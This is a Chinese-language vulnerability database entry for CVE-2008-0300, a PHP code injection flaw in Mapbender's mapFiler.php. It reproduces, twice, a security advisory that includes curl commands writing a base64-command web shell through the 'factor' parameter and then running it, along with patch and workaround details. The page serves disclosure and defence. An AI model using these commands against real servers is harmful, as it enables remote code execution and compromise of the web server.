CVE-2008-0300 |
|
发布时间 :2008-03-11 19:44:00 | ||
修订时间 :2011-03-07 22:04:17 | ||||
NMCOEPS |
[原文]mapFiler.php in Mapbender 2.4 to 2.4.4 allows remote attackers to execute arbitrary PHP code via PHP code sequences in the factor parameter, which are not properly handled when accessing a filename that contains those sequences.
[CNNVD]Mapbender ‘mapFiler.php’ 代码注入漏洞(CNNVD-200803-174)
Mapbender中的mapFiler.php存在代码注入漏洞。远程攻击者通过系数参数中的PHP代码序列来执行任意PHP代码。该序列在登陆包含该序列的文件名时并没经过合适的处理。
–
CVSS (基础分值)
CVSS分值: | 6.8 | [中等(MEDIUM)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | MEDIUM | [漏洞利用存在一定的访问条件] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-94 | [对生成代码的控制不恰当(代码注入)] |
–
CPE (受影响的平台与产品)
cpe:/a:mapbender:mapbender:2.4.4 | |
cpe:/a:mapbender:mapbender:2.4.3 | |
cpe:/a:mapbender:mapbender:2.4.2 | |
cpe:/a:mapbender:mapbender:2.4 | |
cpe:/a:mapbender:mapbender:2.4.1 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://www.securityfocus.com/bid/28195 (PATCH) BID 28195 |
http://xforce.iss.net/xforce/xfdb/41131 (UNKNOWN) XF mapbender-mapfilter-code-execution(41131) |
http://xforce.iss.net/xforce/xfdb/41131 (UNKNOWN) XF mapbender-mapfiler-code-execution(41131) |
http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php (UNKNOWN) MISC http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php |
http://www.milw0rm.com/exploits/5232 (UNKNOWN) MILW0RM 5232 |
http://secunia.com/advisories/29329 (UNKNOWN) SECUNIA 29329 |
–
漏洞信息
Mapbender ‘mapFiler.php’ 代码注入漏洞 | |
中危 | 代码注入 |
2008-03-11 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
Mapbender中的mapFiler.php存在代码注入漏洞。远程攻击者通过系数参数中的PHP代码序列来执行任意PHP代码。该序列在登陆包含该序列的文件名时并没经过合适的处理。 |
–
公告与补丁
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接: http://www.mapbender.org/ |
–
漏洞信息 (5232)
Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability (EDBID:5232) | |
php | webapps |
2008-03-11 | Verified |
0 | RedTeam Pentesting |
N/A |
[点击下载] |
Advisory: Remote Command Execution in Mapbender During a penetration test RedTeam Pentesting discovered a remote command execution vulnerability in Mapbender. An unauthorized user can create arbitrary PHP-files on the Mapbender webserver, which can later be executed. Details ======= Product: Mapbender Affected Versions: 2.4 - 2.4.4 (verified), probably older versions, too Fixed Versions: 2.4.5rc1 Vulnerability Type: Remote Command Execution Security-Risk: high Vendor-URL: http://www.mapbender.org Vendor-Status: informed, fixed version released Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php Advisory-Status: public CVE: CVE-2008-0300 CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0300 Introduction ============ "Mapbender is the software and portal site for geodata management of OGC OWS architectures. The software provides web technology for managing spatial data services implemented in PHP, JavaScript and XML. It provides a data model and interfaces for displaying, navigating and querying OGC compliant map services. The Mapbender framework furthermore provides authentication and authorization services, OWS proxy functionality, management interfaces for user, group and service administration in WebGIS projects." (from the vendor's homepage) More Details ============ The Mapbender software comes with a script mapFiler.php, which is located at http://www.example.com/tools/mapFiler.php Due to the lack of input filtering, an attacker is able to enter valid PHP code in the "factor" input field. This PHP code is written into a newly generated file in the Mapbender webfolder. Therefore, it is possible to remotely execute the code by requesting the new file. Proof of Concept ================ For this example, the user account which is used to execute php scripts needs permissions to write files to the tmp directory. Any other directory with write permissions in the web root can be used, too. Calling curl -d "myLocation=../tmp/.&factor=.php&button=let's go" http://www.example.com/ tools/mapFiler.php creates a file tmp/_\<\?php\ passthru\(base64_decode\(\$_GET\[c\]\)\)\ \?\>.php. with the content: #Modified by MapbenderTools #Date: 14.01.2008 #Factor: .php This script can then be executed by calling: curl -g 'http://www.example.com/tmp/_<%3fphp%20passthru(base64_decode( $_GET[c]))%20%3f>.php.?c=aWQ' It returns: #Modified by MapbenderTools #Date: 15.01.2008 #Factor: uid=33(www-data) gid=33(www-data) groups=33(www-data) .php Commands sent to the script have to be base64 encoded and will be decoded by the PHP code, to avoid possible URL filtering on the victim's side. Workaround ========== If not needed, the mapfiler.php script can be removed. Otherwise, it can be protected by using an .htaccess directive. Fix === The vulnerability is fixed in release 2.4.5 rc1. Security Risk ============= The security risk is rated as high. An attacker can execute arbitrary commands remotely with the rights of the webserver. History ======= 2007-12-14 Problem identified during a penetration test 2008-01-09 Customer approves contacting of Mapbender developers 2008-01-17 CVE number assigned 2008-03-10 Vendor releases fixed version 2008-03-11 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. # milw0rm.com [2008-03-11]
–
漏洞信息 (F64487)
rt-sa-2008-001.txt (PacketStormID:F64487) |
2008-03-13 00:00:00 |
exploit,remote,php,code execution |
CVE-2008-0300 |
[点击下载] |
Mapbender versions 2.4.4 and below suffer from a remote code execution vulnerability in mapFiler.php. |
Advisory: Remote Command Execution in Mapbender During a penetration test RedTeam Pentesting discovered a remote command execution vulnerability in Mapbender. An unauthorized user can create arbitrary PHP-files on the Mapbender webserver, which can later be executed. Details ======= Product: Mapbender Affected Versions: 2.4 - 2.4.4 (verified), probably older versions, too Fixed Versions: 2.4.5rc1 Vulnerability Type: Remote Command Execution Security-Risk: high Vendor-URL: http://www.mapbender.org Vendor-Status: informed, fixed version released Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php Advisory-Status: public CVE: CVE-2008-0300 CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0300 Introduction ============ "Mapbender is the software and portal site for geodata management of OGC OWS architectures. The software provides web technology for managing spatial data services implemented in PHP, JavaScript and XML. It provides a data model and interfaces for displaying, navigating and querying OGC compliant map services. The Mapbender framework furthermore provides authentication and authorization services, OWS proxy functionality, management interfaces for user, group and service administration in WebGIS projects." (from the vendor's homepage) More Details ============ The Mapbender software comes with a script mapFiler.php, which is located at http://www.example.com/tools/mapFiler.php Due to the lack of input filtering, an attacker is able to enter valid PHP code in the "factor" input field. This PHP code is written into a newly generated file in the Mapbender webfolder. Therefore, it is possible to remotely execute the code by requesting the new file. Proof of Concept ================ For this example, the user account which is used to execute php scripts needs permissions to write files to the tmp directory. Any other directory with write permissions in the web root can be used, too. Calling curl -d "myLocation=../tmp/.&factor=.php&button=let's go" http://www.example.com/ tools/mapFiler.php creates a file tmp/_\<\?php\ passthru\(base64_decode\(\$_GET\[c\]\)\)\ \?\>.php. with the content: #Modified by MapbenderTools #Date: 14.01.2008 #Factor: .php This script can then be executed by calling: curl -g 'http://www.example.com/tmp/_<%3fphp%20passthru(base64_decode( $_GET[c]))%20%3f>.php.?c=aWQ' It returns: #Modified by MapbenderTools #Date: 15.01.2008 #Factor: uid=33(www-data) gid=33(www-data) groups=33(www-data) .php Commands sent to the script have to be base64 encoded and will be decoded by the PHP code, to avoid possible URL filtering on the victim's side. Workaround ========== If not needed, the mapfiler.php script can be removed. Otherwise, it can be protected by using an .htaccess directive. Fix === The vulnerability is fixed in release 2.4.5 rc1. Security Risk ============= The security risk is rated as high. An attacker can execute arbitrary commands remotely with the rights of the webserver. History ======= 2007-12-14 Problem identified during a penetration test 2008-01-09 Customer approves contacting of Mapbender developers 2008-01-17 CVE number assigned 2008-03-10 Vendor releases fixed version 2008-03-11 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de.
–
漏洞信息
42847 |
|
Mapbender mapFiler.php factor Variable Arbitrary PHP Code Execution | |
Remote / Network Access |
Input Manipulation |
Loss of Integrity | Upgrade |
Exploit Public | Vendor Verified, Vendor Verified, Coordinated Disclosure |
–
漏洞描述
–
时间线
2008-03-11 |
2007-12-14 |
2008-03-11 | 2008-03-10 |
–
解决方案
Upgrade to version 2.4.5 rc1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. |
–
相关参考
–
漏洞作者
Unknown or Incomplete |
–
漏洞信息
Mapbender ‘factor’ Parameter Remote Code Injection Vulnerability | |
Input Validation Error |
28195 |
Yes | No |
2008-03-11 12:00:00 | 2008-03-12 06:31:00 |
RedTeam Pentesting GmbH is credited with the discovery of this vulnerability. |
–
受影响的程序版本
Mapbender Mapbender 2.4.4 Mapbender Mapbender 2.4.3 Mapbender Mapbender 2.4.2 Mapbender Mapbender 2.4.1 Mapbender Mapbender 2.4 Mapbender Mapbender 2.4.5 rc1 |
–
不受影响的程序版本
Mapbender Mapbender 2.4.5 rc1 |
–
漏洞讨论
Mapbender is prone to a remote code-injection vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue allows attackers to execute arbitrary code within the context of the webserver. This issue affects Mapbender 2.4 to 2.4.4; other versions may also be affected. |
–
漏洞利用
Attackers can exploit this issue via a browser. The following proof of concept is available: |
–
解决方案
The vendor has released updates. Please see the references for more information.
|
–
相关参考
|